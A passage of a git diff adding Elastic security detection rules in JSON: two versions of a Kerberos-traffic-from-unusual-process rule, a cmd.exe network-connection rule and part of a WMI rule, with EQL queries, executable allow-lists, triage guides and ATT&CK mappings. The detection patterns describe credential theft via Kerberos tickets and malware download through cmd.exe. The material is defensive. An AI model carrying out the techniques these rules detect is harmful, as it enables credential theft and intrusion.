"dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_109.json b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_109.json new file mode 100644 index 00000000000..804c72d3638 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_109.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies network connections to the standard Kerberos port from an unusual process. On Windows, the only process that normally performs Kerberos traffic from a domain joined host is lsass.exe.", + "false_positives": [ + "HTTP traffic on a non standard port. Verify that the destination IP address is not related to a Domain Controller." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kerberos Traffic from Unusual Process", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction == \"egress\" and\n destination.port == 88 and source.port >= 49152 and process.pid != 4 and destination.address : \"*\" and\n not \n (\n process.executable : (\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\Amazon Corretto\\\\jdk1*\\\\bin\\\\java.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Core\\\\tomcat-core\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files\\\\DBeaver\\\\dbeaver.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.backend.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files\\\\Oracle\\\\VirtualBox\\\\VirtualBoxVM.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files\\\\Silverfort\\\\Silverfort AD Adapter\\\\SilverfortServer.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files (x86)\\\\SAP BusinessObjects\\\\tomcat\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\vmnat.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\",\n \"System\"\n ) and process.code_signature.trusted == true\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.address", + "type": "keyword" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "897dc6b5-b39f-432a-8d75-d3730d50c782_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_110.json b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_110.json new file mode 100644 index 00000000000..2be59b1359a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_110.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies network connections to the standard Kerberos port from an unusual process. On Windows, the only process that normally performs Kerberos traffic from a domain joined host is lsass.exe.", + "false_positives": [ + "HTTP traffic on a non standard port. Verify that the destination IP address is not related to a Domain Controller." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.network-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kerberos Traffic from Unusual Process", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction == \"egress\" and\n destination.port == 88 and source.port >= 49152 and process.pid != 4 and destination.address : \"*\" and\n not \n (\n process.executable : (\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\Amazon Corretto\\\\jdk1*\\\\bin\\\\java.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Core\\\\tomcat-core\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files\\\\DBeaver\\\\dbeaver.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.backend.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files\\\\Oracle\\\\VirtualBox\\\\VirtualBoxVM.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files\\\\Silverfort\\\\Silverfort AD Adapter\\\\SilverfortServer.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files (x86)\\\\SAP BusinessObjects\\\\tomcat\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\vmnat.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\",\n \"System\"\n ) and process.code_signature.trusted == true\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.address", + "type": "keyword" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "897dc6b5-b39f-432a-8d75-d3730d50c782_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_107.json b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_107.json new file mode 100644 index 00000000000..95685b24c53 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_107.json @@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies cmd.exe making a network connection. Adversaries could abuse cmd.exe to download or execute malware from a remote URL.", + "false_positives": [ + "Administrators may use the command prompt for regular administrative tasks. It's important to baseline your environment for network connections being made from the command prompt to determine any abnormal use of this tool." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Command Prompt Network Connection", + "note": "## Triage and analysis\n\n### Investigating Command Prompt Network Connection\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using a command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThis rule looks for a network connection to an external address from the `cmd.exe` utility, which can indicate the abuse of the utility to download malicious files and tools.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine if any file was downloaded and check if it is an executable or script.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and file name conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"cmd.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"cmd.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\") and\n not dns.question.name : (\n \"wpad\", \"localhost\", \"ocsp.comodoca.com\", \"ocsp.digicert.com\", \"ocsp.sectigo.com\", \"crl.comodoca.com\"\n )]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "89f9a4b0-9f8f-4ee0-8823-c4751a6d6696", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_107", 